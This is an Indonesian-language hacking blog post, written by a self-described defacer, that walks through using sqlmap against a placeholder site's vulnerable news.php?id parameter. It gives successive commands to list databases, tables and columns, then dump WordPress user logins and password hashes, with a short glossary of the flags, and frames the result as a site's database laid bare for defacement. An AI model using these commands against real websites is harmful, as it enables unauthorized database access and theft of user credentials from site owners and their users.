UDah lama kagak Post tentang Deface :v bertemu kembali dengan saya ./Dr.D4fuq404 :D
ane mau share ilmu nihh yaitu
alat alat yang anda butuhkan :
- DORK SQLmap
- Phyton 2.7
- Script SQLmap
- Internet
- Windows
pertama kita buka CMD lalu ketikan command berikut
sqlmap.py -u http://www.siteTARGET.com/hki/news/news.php?idatau bisa juga dengan command berikut
=37 --dbs
sqlmap.py -u http://www.siteTARGET.com/hki/news/news.php?id=37 --current-dblalu tekan enter,,jika site nya vuln atau vulnerable maka hasilnya akan tampak seperti SS yang ada di bawah ini
klik untuk memperbesar |
sqlmap.py -u http://www.siteTARGET/hki/news/news.php?id=37 -D wpdb_1n0v4s1 --tables
maka hasilnya akan tampak seperti yang ada di SS di bawah
klik untuk memperbesar |
sqlmap.py -u http://www.siteTARGET/hki/news/news.php?id=37 -D wpdb_1n0v4s1 -T wp_tbl_1n0v4s1users --columnsmaka hasilnya akan tampak seperti ss di bawah
klik untuk memperbesar |
langkah selanjutnya kita ketikan command yg di bawah ini di CMD sobat
sqlmap.py -u http://www.siteTARGET/hki/news/news.php?id
=37 -D wpdb_1n0v4s1 -T wp_tbl_1n0v4s1users -C user_login,user_pass --dump
maka hasilnya seperti yang di bawah ini jreng jreng telanjang dah tuh database website nya
klik untuk memperbesar |
--dbs ( memanggil semua database yang ada dalam server )
--current-db ( hanya mengambil database yang terkait di dalam situs web tersebut )
--tables ( memanggil table yang ada di dalam database )
--columns ( memanggil kolom yang ada di dalam database table )
--dump ( memanggil username dan password yg terdapat di dalam database tabel )
Post a Comment